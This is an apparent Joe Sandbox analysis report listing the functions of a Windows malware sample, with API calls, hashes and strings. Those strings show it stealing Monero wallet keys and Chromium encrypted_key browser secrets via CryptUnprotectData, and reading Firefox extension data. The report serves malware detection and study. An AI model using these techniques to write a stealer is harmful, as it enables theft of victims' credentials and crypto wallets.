                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003796AE,00000000), ref: 00378EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00378EF2
                                    • wsprintfW.USER32 ref: 00378F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 2f147f417fda73f67706d9f9b921cd9f8e9440ea4522eface4e0b0d867bd2f3f
                                    • Instruction ID: d1f61c1d182ab2a093e5a3a2fe936c7bd1c788d7fb564c5482e50519752fc720
                                    • Opcode Fuzzy Hash: 2f147f417fda73f67706d9f9b921cd9f8e9440ea4522eface4e0b0d867bd2f3f
                                    • Instruction Fuzzy Hash: 7DE0ECB5A48309BBDB24DB94DD0AE6E77B9EB05702F001194FD0997340DA719F10DBD5
                                    Function 0036A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0036AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 0036ADEC
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 7f1705034202c309b0cc34c0cbd0c80651956836855930f3957c9fb7ad81d743
                                    • Instruction ID: d4996167a8404c794f62f11837e4210781b62bcc0cb0df4c7fc598f184dd503d
                                    • Opcode Fuzzy Hash: 7f1705034202c309b0cc34c0cbd0c80651956836855930f3957c9fb7ad81d743
                                    • Instruction Fuzzy Hash: 0FE1E4729105089BCB26FBA4DDA2EEE737DAF54300F50C559F11B76091EF346A48CB62
                                    Function 0036D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D581
                                    • lstrlen.KERNEL32(00000000), ref: 0036D798
                                    • lstrlen.KERNEL32(00000000), ref: 0036D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 4fd5af784a837cc27522528849278a719f3217e3bf46a39cc3af26f33be118cf
                                    • Instruction ID: 8b24f31502522f19bcfe3068071278a8221ca92244807ea83dfd2c0e8fb68a34
                                    • Opcode Fuzzy Hash: 4fd5af784a837cc27522528849278a719f3217e3bf46a39cc3af26f33be118cf
                                    • Instruction Fuzzy Hash: 1891FB729105049BCB26FBA4DCA6DEE737DAF54300F50C559F11B7A091EF346A08CB62
                                    Function 0036D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D901
                                    • lstrlen.KERNEL32(00000000), ref: 0036DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 0036DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 0896d73d541e00101378fe1573691de584921f96b996ecadea058ddc91655631
                                    • Instruction ID: e632e62c43ef87b3e4d12cdaa542d42e80b9fbe4894c49237edaa409cacb6f6d
                                    • Opcode Fuzzy Hash: 0896d73d541e00101378fe1573691de584921f96b996ecadea058ddc91655631
                                    • Instruction Fuzzy Hash: 3381E7729105049BCB26FBA4DCA6DEE7379AF94300F50C559F51B6A091EF386A08CB72
                                    Function 003DFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: 272508cc6bcbfa07823518304f8e9945bcfb3ca65df5a4cbecab9224c066053a
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: 4251E573500256AFEB2B8F55E881BBA77A8FF01304F25462EE8065B791E771ED80D790
                                    Function 0036A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0036A664
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: cb000a55e9a836c9ec8ba2e53326ffa611f6c68e7bf6fb560647198a2553810c
                                    • Instruction ID: a2fd61308b98adaab104cacd0bf8f2816a5a276c457f840232216d81e1ba7bd9
                                    • Opcode Fuzzy Hash: cb000a55e9a836c9ec8ba2e53326ffa611f6c68e7bf6fb560647198a2553810c
                                    • Instruction Fuzzy Hash: C6514C70A10208AFDB29EFA4CD96FED77B5AF81304F00C118E90A6F295EB746A05CB51
                                    Function 0036F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00381678,00380D93), ref: 0036F64C
                                    • lstrlen.KERNEL32(00000000), ref: 0036F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: a83a8efef8091f3c5b9d7ba08b861f5d42a2a343c883b2080eb65c9f7f1e839d
                                    • Instruction ID: 0ce7f01921c263e007a1f0d45da7dee7144c1cc4c0fad3d2387f24b7a400f40d
                                    • Opcode Fuzzy Hash: a83a8efef8091f3c5b9d7ba08b861f5d42a2a343c883b2080eb65c9f7f1e839d
                                    • Instruction Fuzzy Hash: B7512372D105089BCB26FBB4DD62DED7379AF94300F50C568F41B6B195EE386A08CB62
                                    Function 003737B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: f55b6c2a53dc2d44ada43b94eb590fe3ed2e9ad9dc224f9614b079deb3b86a9b
                                    • Instruction ID: da297a7c8b37cf5aa62a2dea52a24a607984a238fcb7c10bf6d5246e619b3305
                                    • Opcode Fuzzy Hash: f55b6c2a53dc2d44ada43b94eb590fe3ed2e9ad9dc224f9614b079deb3b86a9b
                                    • Instruction Fuzzy Hash: 8B414F71D142099BCB25EFA4D855AEEB779AF44304F00C018F51A7B290EB789B09DFA2
                                    Function 0036A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0036A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0036A13C
                                      • Part of subcall function 0036A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0036A161
                                      • Part of subcall function 0036A110: LocalAlloc.KERNEL32(00000040,?), ref: 0036A181
                                      • Part of subcall function 0036A110: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 0036A1AA
                                      • Part of subcall function 0036A110: LocalFree.KERNEL32(0036148F), ref: 0036A1E0
                                      • Part of subcall function 0036A110: CloseHandle.KERNEL32(000000FF), ref: 0036A1EA
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0036A489
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A23F
                                      • Part of subcall function 0036A210: LocalAlloc.KERNEL32(00000040,?,?,?,00364F3E,00000000,?), ref: 0036A251
                                      • Part of subcall function 0036A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O6,00000000,00000000), ref: 0036A27A
                                      • Part of subcall function 0036A210: LocalFree.KERNEL32(?,?,?,?,00364F3E,00000000,?), ref: 0036A28F
                                      • Part of subcall function 0036A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0036A2D4
                                      • Part of subcall function 0036A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0036A2F3
                                      • Part of subcall function 0036A2B0: LocalFree.KERNEL32(?), ref: 0036A323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
